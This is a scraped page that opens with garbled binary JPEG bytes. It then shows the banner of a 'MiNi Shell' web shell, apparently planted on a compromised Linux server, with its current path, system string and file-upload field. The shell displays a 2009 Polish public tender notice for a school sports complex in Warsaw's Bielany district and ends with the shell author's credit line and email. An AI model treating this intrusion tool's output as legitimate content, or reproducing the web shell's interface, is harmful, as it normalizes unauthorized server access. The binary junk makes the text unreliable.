JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090709/229614-N-2009.html

<p class="kh_header"><b>Warszawa: Budowa kompleksu boisk sportowych zgodnie z założeniami programu Moje Boisko - Orlik 2012 na terenie Szkoły Podstawowej Nr 53 przy ul. Rudzkiej 6 w Warszawie.</b><br>
<b>Numer ogłoszenia: 229614 - 2009; data zamieszczenia: 09.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa - Dzielnica Bielany , ul. Przybyszewskiego 70/72, 01-824 Warszawa, woj. mazowieckie, tel. 022 8651935, faks 022 8644857.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bielany.waw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiający nie zamierza zawierać umowy ramowej ani ustanawiać dynamicznego systemu zakupów.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu boisk sportowych zgodnie z założeniami programu Moje Boisko - Orlik 2012 na terenie Szkoły Podstawowej Nr 53 przy ul. Rudzkiej 6 w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa kompleksu boisk sportowych zgodnie z założeniami programu Moje Boisko - Orlik 2012 na terenie Szkoły Podstawowej Nr 53 przy ul. Rudzkiej 6 w Warszawie obejmującego:
-boisko piłkarskie o nawierzchni syntetycznej typu sztuczna trawa (62X30 m),
-boisko do koszykówki i piłki siatkowej (19,10 x32,10) o nawierzchni poliuretanowej,
-wyposażenie do piłki koszykowej i siatkowej, bramki aluminiowe i siatki do bramek,
-odwodnienie terenu, oświetlenie boisk, ogrodzenie boisk, chodniki, schody i rampa dla osób niepełnosprawnych przy budynku kontenerowym, fundamenty pod budynek zaplecza socjalnego, budowa budynku kontenerowego z elementów gotowych (4 moduły o wymiarach zewnętrznych 15,54 x 5,34 m),
-elementy malej architektury( ławki, kosze na śmieci), zieleń. 
Szczegółowy opis przedmiotu zamówienia zawierają załączniki do SIWZ. 
W ramach robót przygotowawczych należy uwzględnić wycinkę jednego drzewa. Zezwolenie na wycinkę oraz opłatę administracyjną zabezpiecza Zamawiający..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 10 000,00 zł. (słownie: dziesięć tysięcy złotych 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> III.2.1) O udzielenie zamówienia mogą ubiegać się wykonawcy nie wykluczeni na podstawie art. 24 ust. 1 i 2 oraz  spełniający warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 roku (tekst jednolity Dz. U. z 2007 r. Nr 223 poz.1655 ze zmianami), w tym: 

1) udokumentowane należyte wykonania, w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie boisk sportowych (CPV 45 21 22 21-1), w tym: jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową (z podaniem ich wartości, dat wykonania oraz odbiorców). 

2) dysponowaniem w celu wykonania zamówienia przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności:
a) konstrukcyjno-budowlanej, 
b)instalacyjnej w zakresie sieci i instalacji wodociągowych i kanalizacyjnych, 
c)instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.

3)ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN. 

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty , z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> III.2.2) 
1)Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią: Załącznik Nr 6 (Podpisuje i składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie powyższy dokument podpisują i składają wszyscy członkowie konsorcjum lub Pełnomocnik w imieniu całego konsorcjum, z zaznaczeniem że treść  należy zawrzeć w oświadczeniu, zgodnie ze stanem faktycznym) oraz Załącznik Nr 7 do  SIWZ (Podpisuje i składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie powyższy dokument podpisują i składają wszyscy członkowie konsorcjum).

2)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
(Dokument ten składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie powyższy dokument składają wszyscy członkowie konsorcjum a poświadcza za zgodność z oryginałem Pełnomocnik)
3)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
(Dokument ten składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie powyższy dokument składają wszyscy członkowie konsorcjum a poświadcza za zgodność z oryginałem Pełnomocnik)

4) Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
(Dokument ten składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie powyższy dokument składają wszyscy członkowie konsorcjum a poświadcza za zgodność z oryginałem Pełnomocnik)

5)Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęciem postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie boisk sportowych (CPV 45 21 22 21-1), w tym: jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową, z podaniem ich wartości, dat wykonania oraz odbiorców. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły ostatecznego odbioru robót, itp.) Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 5 do niniejszej SIWZ.
(Dokumenty te składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie wykaz robót budowlanych składa Pełnomocnik a dokumenty potwierdzające, że roboty te zostały wykonane należycie  składają członkowie konsorcjum, którzy spełniają warunek udziału w postępowaniu a poświadcza za zgodność z oryginałem Pełnomocnik)

6) Dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi przez wskazane osoby w zakresie niezbędnym do wykonania zamówienia w specjalnościach: 
1) konstrukcyjno-budowlanej, 
2) instalacyjnej w zakresie sieci i instalacji wodociągowych i kanalizacyjnych,
 3)instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby.
(Dokumenty te składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie powyższe dokumenty składają członkowie konsorcjum, którzy spełniają warunek udziału w postępowaniu a poświadcza za zgodność z oryginałem Pełnomocnik)

7) Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN. 
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN.
(Dokument ten składa każdy wykonawca składający ofertę . W przypadku Wykonawców wspólnie ubiegających się o zamówienie wykonawcy mogą zastosować się do ww. zapisu lub powyższy dokument składają członkowie konsorcjum, którzy spełniają warunek udziału w postępowaniu)
III.2.3) Wykaz oświadczeń lub dokumentów potwierdzających spełnianie wymagań jakościowych, które należy dołączyć do oferty:
1) oświadczenie wykonawcy dotyczące oferowanej nawierzchni syntetycznej typu sztuczna trawa, jaka zostanie ułożona na boisku piłkarskim (Załącznik Nr 5a do SIWZ),
(Dokument ten składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie powyższy dokument podpisuje Pełnomocnik w imieniu całego konsorcjum)
2)oświadczenie wykonawcy dotyczące nawierzchni poliuretanowej, jaka zostanie ułożona na boisku wielofunkcyjnym (Załącznik Nr 5b do SIWZ),
(Dokument ten składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument podpisuje Pełnomocnik w imieniu całego konsorcjum)
A. Dokumenty dotyczące nawierzchni poliuretanowej:
Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub 
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB, lub 
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.
Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
Atest PZH dla oferowanej nawierzchni.
Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.

B. Dokumenty dotyczące nawierzchni z trawy syntetycznej:
Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com).
Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB, lub
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny. 
Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
Atest PZH dla oferowanej nawierzchni.
Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.

(Dokumenty wymienione w pkt. A i B składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie powyższe dokumenty składają członkowie konsorcjum, którzy będą realizowali zamówienie w tym zakresie a poświadcza za zgodność z oryginałem Pełnomocnik.)
Inne dokumenty wymagane w postępowaniu 
Wypełniony druk OFERTA - zgodny w treści ze wzorem stanowiącym załącznik nr 8 do SIWZ;
(Dokument ten składa każdy wykonawca składający ofertę. W przypadku Wykonawców wspólnie ubiegających się o zamówienie powyższy dokument podpisuje i składa Pełnomocnik)

2) Pełnomocnictwo, w sytuacji gdy wykonawcę reprezentuje pełnomocnik lub w przypadku złożenia oferty wspólnej. 

Uwaga: Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605) oraz rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniającym rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. nr 188, poz.1155).

Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem przypadku :
1) zmiany dokumentacji projektowej przez zamawiającego, nie prowadzącej do zmiany przedmiotu zamówienia określonego w siwz i umowie, w sytuacji wystąpienia wady projektowej, której  wykonawca nie miał obowiązku sprawdzić, która uniemożliwiałaby prawidłowe wykonanie zamówienia i której nie dało się przewidzieć w chwili zawarcia umowy, ustala się:
1.1. gdy wykonanie robót z projektu zamiennego nie podwyższy wynagrodzenia, o którym mowa w § 5 ust.1 wzoru umowy:
a) obniżenie wynagrodzenia za niewykonane roboty;
b) zlecenie wykonania robót wynikających z dokumentacji projektowej zamiennej z zastosowaniem cen jednostkowych z kosztorysu ofertowego a w przypadku ich braku dla ustalenia ceny jednostkowej będą miały zastosowanie jako maksymalne średnie kwartalne stawki składników cenotwórczych (stawka robocizny netto, materiału wraz z kosztami zakupu, 
sprzęt, koszty pośrednie i zysk) publikowane w wydawnictwie SEKOCENBUD z okresu realizacji robót. W przypadku braku cen materiałów i sprzętu ww. wydawnictwie wg cen rynkowych uzgodnionych z zamawiającym. Kosztorys należy sporządzić w oparciu o ogólnodostępne katalogi nakładów rzeczowych.
W powyższej sytuacji aneks może dotyczyć ewentualnego obniżenia wynagrodzenia, jeżeli wartość robót z punktu b) jest niższa niż wartość z punktu a) lub terminu realizacji, gdy zajdzie uzasadniona konieczność.
1.2. gdy wykonanie robót z projektu zamiennego podwyższałoby wynagrodzenie, o którym mowa w §5 wzoru umowy
a) obniżenie wynagrodzenia za niewykonane roboty
b) wykonanie tych robót będzie przedmiotem odrębnego postępowania (ich wykonanie nie będzie przedmiotem niniejszej umowy).
W tej sytuacji aneks dotyczyć będzie obniżenia wynagrodzenia za niewykonane roboty oraz zmiany terminu realizacji gdy zajdzie uzasadniona konieczność.
2) wystąpienia awarii infrastruktury biegnącej przez teren budowy, powstałej bez winy Wykonawcy.  Ewentualna zmiana terminu umownego, zostanie określona po usunięciu awarii i jej skutków,
3) konieczności losowej zmiany nadzoru technicznego ze strony Wykonawcy lub Zamawiającego.
4) konieczności wprowadzenia zmian dotyczących terminów i wysokości fakturowania częściowego (bez zmiany kwoty umownej) w przypadku aneksowania umowy z przyczyn określonych w punkcie 1) i 2)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bielany.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Wydziale Zamówień Publicznych dla Dzielnicy Bielany m.st. Warszawy przy ul. Schroegera 90 pok.5, (cena 85,25 zł.,).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2009 godzina 10:00, miejsce: Wydział Zamówień Publicznych dla Dzielnicy Bielany m.st. Warszawy przy ul. Schroegera 90 pok. Nr 5..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com